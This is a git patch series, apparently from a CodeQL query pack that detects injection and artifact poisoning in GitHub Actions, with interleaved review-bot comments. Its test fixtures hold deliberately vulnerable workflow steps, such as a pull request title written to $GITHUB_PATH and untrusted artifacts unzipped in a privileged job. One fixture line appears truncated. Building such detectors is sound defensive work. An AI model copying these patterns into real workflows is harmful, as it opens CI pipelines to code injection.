+ - env:
+ PATHINJ: ${{ github.event.pull_request.title }}
+ run: echo ${PATHINJ} >> $GITHUB_PATH
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: artifact_name
+ path: foo
+ - run: echo "$(cat foo/bar)" >> $GITHUB_PATH
+ - env:
+ ACTIONS_ALLOW_UNSECURE_COMMANDS: true
+ PATHINJ: ${{ github.event.pull_request.title }}
+ run: echo "::add-path::$PATHINJ"
+
+
+
+
diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual
new file mode 100644
index 00000000000..6d9801ccd81
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual
@@ -0,0 +1,10 @@
+edges
+| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:9:26:6 | Run Step |
+| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:26:9:29:41 | Run Step |
+nodes
+| .github/workflows/path1.yml:11:21:11:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title |
+| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step |
+| .github/workflows/path1.yml:25:9:26:6 | Run Step | semmle.label | Run Step |
+| .github/workflows/path1.yml:26:9:29:41 | Run Step | semmle.label | Run Step |
+subpaths
+#select
diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref
new file mode 100644
index 00000000000..ab36454942e
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref
@@ -0,0 +1 @@
+Security/CWE-077/EnvPathInjection.ql
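Review bot: None of the `>> $GITHUB_PATH` writes in `path1.yml` is asserted as a finding, because the recorded output ends in an empty `#select` section and the only `.qlref` added points at `Security/CWE-077/EnvPathInjection.ql`. The fixture's sole trigger is `pull_request_target`, which presumably places it on the privileged side of the split, so the query that should flag it, `PrivilegedEnvPathInjection.ql`, has no test here. Adding a `PrivilegedEnvPathInjection.qlref` containing `Security/CWE-077/PrivilegedEnvPathInjection.ql`, with its own expected output, would pin the detections. A second fixture triggered by `pull_request` would give the non-privileged query a positive case. The results file is also committed as `.actual` rather than `.expected`, so it may not be compared against at all.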
From ef9583a92171ad1c8880e4200955613d98103d19 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 16:20:36 +0200 Subject: [PATCH 0210/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b557a60a751..94df84766b5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.14 +version: 0.0.15 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99ecbe14d55..60e21004b84 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.14 +version: 0.0.15 groups: - actions - queries From 61976c684eadace821972df4519516a202b83f56 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 23:28:58 +0200 Subject: [PATCH 0211/1267] Lower privilege checks to Jobs --- .github/action/src/codeql.ts | 7 +++ action.yml | 35 ++++++++++- ql/lib/codeql/actions/Ast.qll | 33 +--------- ql/lib/codeql/actions/ast/internal/Ast.qll | 63 +++++++++++++++++++ .../codeql/actions/dataflow/ExternalFlow.qll | 7 +++ .../internal/ExternalFlowExtensions.qll | 5 ++ .../ext/workflow-models/workflow-models.yml | 5 ++ ql/lib/qlpack.yml | 1 + ql/src/Security/CWE-077/EnvPathInjection.ql | 8 +-- ql/src/Security/CWE-077/EnvVarInjection.ql | 8 +-- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 +- .../CWE-077/PrivilegedEnvVarInjection.ql | 6 +- ql/src/Security/CWE-078/CommandInjection.ql | 8 +-- .../CWE-078/PrivilegedCommandInjection.ql | 6 +- ql/src/Security/CWE-094/CodeInjection.ql | 8 +-- .../CWE-094/PrivilegedCodeInjection.ql | 6 +- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 8 +-- .../CWE-829/PrivilegedArtifactPoisoning.ql | 6 +- ql/test/library-tests/workflowenum.expected | 0 ql/test/library-tests/workflowenum.ql | 8 +++ ...ction.actual => EnvPathInjection.expected} | 0 .../.github/workflows/artifactpoisoning61.yml | 53 ++++++++++++++++ 22 files changed, 221 insertions(+), 66 deletions(-) create mode 100644 ql/lib/ext/workflow-models/workflow-models.yml create mode 100644 ql/test/library-tests/workflowenum.expected create mode 100644 ql/test/library-tests/workflowenum.ql rename ql/test/query-tests/Security/CWE-077/{EnvPathInjection.actual => EnvPathInjection.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 0fcdd81ee3f..e845ec9fd4f 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -147,6 +147,13 @@ export async function codeqlDatabaseAnalyze( codeql_output, ]; + const extPackPath = process.env["EXTPACK_PATH"]; + const extPackName = process.env["EXTPACK_NAME"]; + if (extPackPath !== undefined && extPackName !== undefined) { + cmd.push("--additional-packs", extPackPath); + cmd.push("--extension-packs", extPackName); + } + // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; diff --git a/action.yml b/action.yml index 9281212ea24..42141a1dd74 100644 --- a/action.yml +++ b/action.yml @@ -18,10 +18,41 @@ inputs: description: "CodeQL Suite to run" default: "actions-code-scanning" + workflow-models: + description: "Workflow models" + required: false + runs: using: 'composite' steps: - - name: Do something with context + - name: Process workflow models + shell: bash + if: inputs.workflow-models + run: | + // Create QLPack directory + mkdir workflow-extpack + cd workflow-extpack + + // Store the extension pack file + cat > models.yml << 'EOF' + ${{ inputs.workflow-models }} + EOF + + // Create QLPack + cat > qlpack.yml << 'EOF' + name: local/workflow-models + library: true + extensionTargets: + githubsecuritylab/actions-all: '*' + dataExtensions: + - models.yml + EOF + + // Set env vars + echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV + echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV + + - name: Scan workflows shell: bash env: GITHUB_TOKEN: ${{ inputs.token }} @@ -29,5 +60,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} + EXTPACK_PATH: ${{ inputs.extpack-path }} + EXTPACK_NAME: ${{ inputs.extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ac222741c02..7c4bf9aa8af 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
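Review bot: In the "Process workflow models" step of `action.yml`, `${{ inputs.workflow-models }}` is substituted into the text of the `run:` script before bash sees it, so quoting the heredoc delimiter does not contain it. A value that includes a line consisting of `EOF` closes the heredoc, and whatever follows is parsed as shell. Pass the input through the step environment instead, with `env:` / `MODELS: ${{ inputs.workflow-models }}` on the step and `printf '%s\n' "$MODELS" > models.yml` in the script. The comment lines in the same script start with `//`, which bash will try to run as a command; they should start with `#`.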
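Review bot: In the "Scan workflows" step, `EXTPACK_PATH: ${{ inputs.extpack-path }}` and `EXTPACK_NAME: ${{ inputs.extpack-name }}` refer to inputs that are not among those this diff adds (only `workflow-models` is), so both expressions most likely evaluate to an empty string. A step-level `env:` entry takes precedence over the value the previous step wrote to `$GITHUB_ENV`, and the new guard in `codeqlDatabaseAnalyze` only tests `!== undefined`, so `--additional-packs ""` and `--extension-packs ""` would be passed to the CLI on every run. Dropping the two `env:` lines lets the `$GITHUB_ENV` values through. The TypeScript guard should also reject empty strings, for example `if (extPackPath && extPackName) {`.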
@@ -228,36 +228,7 @@ class Workflow extends AstNode instanceof WorkflowImpl { Strategy getStrategy() { result = super.getStrategy() } - predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and - count(this.getATriggerEvent()) = 1 - } - - predicate isPrivileged() { - // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" - or - // The Workflow accesses a secret - exists(SecretsExpression expr | - expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) - or - // The Workflow is triggered by an event other than `pull_request` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.isPrivileged() - ) - or - // The Workflow has multiple triggers so at least one is ont "pull_request" - count(this.getATriggerEvent()) > 1 - } + predicate isPrivileged() { super.isPrivileged() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -325,6 +296,8 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + predicate isPrivileged() { super.isPrivileged() } } class LocalJob extends Job instanceof LocalJobImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index dff5f351a69..7cc70c86d20 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -1,6 +1,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.dataflow.ExternalFlow /** * Gets the length of each line in the StringValue . @@ -332,8 +333,40 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + private predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(this.getATriggerEvent()) = 1 + } + /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + + /** Holds if the workflow is privileged. */ + predicate isPrivileged() { + // The Workflow has a permission to write to some scope + this.getPermissions().getAPermission() = "write" + or + // The Workflow accesses a secret + exists(SecretsExpressionImpl expr | + expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or + // The Workflow is triggered by an event other than `pull_request` + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJobImpl call, WorkflowImpl caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.isPrivileged() + ) + or + // The Workflow has multiple triggers so at least one is not "pull_request" + count(this.getATriggerEvent()) > 1 + } } class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { 
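Review bot: The last disjunct of `WorkflowImpl.isPrivileged()` marks every workflow with more than one trigger as privileged, which includes `on: [pull_request, workflow_call]`, two events that the third disjunct treats as unprivileged when either stands alone. Because the privileged and non-privileged queries differ in severity, such workflows would be reported at the higher one. Testing the events directly covers the third and fifth disjuncts in one: `exists(string e | e = this.getATriggerEvent() and not e = ["pull_request", "workflow_call"])`. If the current behaviour is kept, the third disjunct could at least reuse `hasSingleTrigger`, which this hunk moves next to it, instead of repeating the `count(...) = 1` test. The class body continues outside the hunk.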
@@ -597,6 +630,36 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + + /** Holds if the workflow is privileged. */ + predicate isPrivileged() { + // The job has a permission to write to some scope + this.getPermissions().getAPermission() = "write" + or + // The job accesses a secret + exists(SecretsExpressionImpl expr | + expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or + // The effective permissions have write access + exists(string path, string name, string secrets_source, string perms | + workflowDataModel(path, _, name, secrets_source, perms, _) and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") and + ( + secrets_source.trim().toLowerCase() = "actions" or + perms.toLowerCase().matches("%write%") + ) + ) + or + // The job has no expliclit permission, but the enclosing workflow is privileged + not exists(this.getPermissions()) and + not exists(SecretsExpressionImpl expr | + expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) and + // The enclosing workflow is privileged + this.getEnclosingWorkflow().isPrivileged() + } } class LocalJobImpl extends JobImpl { diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index cc7e4c633e3..5db10e7823e 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,6 +2,13 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions +predicate workflowDataModel( + string path, string visibility, string job, string secrets_source, string permissions, + string runner +) { + Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) +} + /** * MaD sources * Fields: 
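Review bot: In `JobImpl.isPrivileged()` the model lookup compares names with `name.trim().matches(this.getId() + "%")`, which is a prefix match and also treats any `_` or `%` in the job id as a wildcard, so a row for `build-release` would also apply to a job whose id is `build`. A job could then inherit `write` permissions or an `actions` secrets source from another job's row and be classified at the wrong severity. If the suffix match exists for names that carry extra text after the id (I cannot tell from the hunk), it needs a delimiter; otherwise use `name.trim() = this.getId()`. The QLDoc should read `/** Holds if the job is privileged. */` rather than "workflow", and "expliclit" in the last comment is a typo. The class body continues outside the hunk.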
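Review bot: `workflowDataModel` is added to `ExternalFlow.qll` without QLDoc, while the neighbouring model predicates in the file document their fields ("MaD sources / Fields:"). The six columns are not self-explanatory, and `JobImpl.isPrivileged()` depends on particular values: it compares `secrets_source` with `"actions"` and looks for `write` inside `permissions`. A comment listing the columns and those accepted values, repeated on the `extensible predicate` declaration in `ExternalFlowExtensions.qll`, would tell authors of a `workflow-models` extension what to supply. As far as this diff shows, `visibility` and `runner` are not read anywhere yet, which is worth stating in the same comment.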
diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 8e8ce10bba9..529f7721e71 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -22,3 +22,8 @@ extensible predicate summaryModel( extensible predicate sinkModel( string action, string version, string input, string kind, string provenance ); + +extensible predicate workflowDataModel( + string path, string visibility, string job, string secrets_source, string permissions, + string runner +); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml new file mode 100644 index 00000000000..f9f983be693 --- /dev/null +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -0,0 +1,5 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: workflowDataModel + data: [] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 94df84766b5..d4b4ca8fdeb 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -15,3 +15,4 @@ groups: dataExtensions: - ext/*.model.yml - ext/**/*.model.yml + - ext/workflow-models/workflow-models.yml diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql index 19b4cf6c01b..720b7aed8cc 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql 
@@ -20,11 +20,11 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 2fca3b32494..af3f2998cc9 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -20,11 +20,11 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql index e9f55d1cbb2..3e7c74ab895 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql 
@@ -19,9 +19,9 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 1a32183bfb2..aac7568e654 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -19,9 +19,9 @@ import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index de60141bb40..6ac15f83207 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql 
@@ -20,11 +20,11 @@ from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql index bbfb226ecd1..adb8f25f077 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql @@ -19,9 +19,9 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index dc28cc2569f..aa5bbfdf75a 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql 
@@ -22,11 +22,11 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 9814df091dd..d043bd930b6 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -21,9 +21,9 @@ import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 19b007902bd..c26862960d1 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql 
@@ -19,11 +19,11 @@ from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sin where ArtifactPoisoningFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql index cd6d5eeb108..379babf35f8 100644 --- a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql @@ -18,9 +18,9 @@ import ArtifactPoisoningFlow::PathGraph from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged artifact poisoning in $@, which may be controlled by an external user.", diff --git a/ql/test/library-tests/workflowenum.expected b/ql/test/library-tests/workflowenum.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql new file mode 100644 index 00000000000..692d1eb706b --- /dev/null +++ b/ql/test/library-tests/workflowenum.ql 
@@ -0,0 +1,8 @@ +import actions +import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions + +from + string path, string visibility, string job, string secrets_source, string permissions, + string runner +where Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) +select visibility, path, job, secrets_source, permissions, runner diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual rename to ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml new file mode 100644 index 00000000000..dcc80c6e74f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml 
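Review bot: This test cannot fail in a meaningful way: `workflowenum.expected` is added empty and the only data shipped for `workflowDataModel` is `data: []` in `ql/lib/ext/workflow-models/workflow-models.yml`, so the query selects nothing by construction. A test-local data extension with one or two rows, plus the matching rows in the expected file, would show that the six columns are read in the order the `select` assumes. The `select` also puts `visibility` before `path`, the reverse of the predicate's parameter order; a comment saying that is intended would help.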
@@ -0,0 +1,53 @@ +name: Dependency Tree Reporter +on: + workflow_run: + workflows: [ "Dependency Tree Input Builder" ] + types: + - completed + +permissions: {} + +jobs: + compare: + permissions: + actions: read + pull-requests: write + runs-on: ubuntu-latest + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + steps: + - name: Download artifacts + uses: actions/github-script@v7.0.1 + with: + script: | + var artifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + console.log(artifacts); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "input-artifacts" + })[0]; + var download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/input.zip', Buffer.from(download.data)); + - name: Set needed env vars in outputs + id: prepare + run: | + unzip input.zip + echo current directory contents + ls -al + + echo Reading PR number + tmp=$(> $GITHUB_OUTPUT + + - run: echo ${{ steps.prepare.outputs.pr }} From 17933cbb549184b3d4e8652104513ef3b1f3f20c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 23:30:22 +0200 Subject: [PATCH 0212/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d4b4ca8fdeb..00b31b33bf5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.15 +version: 0.0.16 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 
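Review bot: `artifactpoisoning61.yml` is added as a fixture, but the commit's file list shows no change to an expected-results file under `ql/test/query-tests/Security/CWE-829/`, so the findings this workflow should produce are not recorded. The `compare` job declares `pull-requests: write`, which makes it privileged under the new job-level check, so the expected output of the privileged artifact-poisoning test is the one to update. The line `tmp=$(> $GITHUB_OUTPUT` also looks truncated, at least as rendered here, since the command substitution is never closed. Please check that the step was committed as intended, because a malformed `run:` script can change which sinks the test exercises.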
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 60e21004b84..dc9c140e60f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.15 +version: 0.0.16 groups: - actions - queries From f73571a7524193b3be87e65c72815f94490ef445 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 11:20:52 +0200 Subject: [PATCH 0213/1267] fix: fix shell comments --- action.yml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/action.yml b/action.yml index 42141a1dd74..9580cff83e8 100644 --- a/action.yml +++ b/action.yml @@ -29,16 +29,25 @@ runs: shell: bash if: inputs.workflow-models run: | - // Create QLPack directory + # Create QLPack directory mkdir workflow-extpack cd workflow-extpack - // Store the extension pack file - cat > models.yml << 'EOF' + # Store the extension pack file + cat > models.json << 'EOF' ${{ inputs.workflow-models }} EOF - // Create QLPack + # Store the extension pack file + cat > models.yml << 'EOF' + extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: workflowDataModel + data: [] + EOF + + # Create QLPack cat > qlpack.yml << 'EOF' name: local/workflow-models library: true @@ -48,7 +57,7 @@ runs: - models.yml EOF - // Set env vars + # Set env vars echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV From a2ed07ec3525a4fc032f0d17a3ab9ed093bb01aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 12:43:23 +0200 Subject: [PATCH 0214/1267] Update scan action --- .github/action/dist/index.js | 11 ++++++++++- .github/action/package-lock.json | 14 +++++++------- .github/action/package.json | 2 +- .github/action/src/codeql.ts | 7 ++++++- action.yml | 15 +++------------ 5 files changed, 27 insertions(+), 22 deletions(-) 
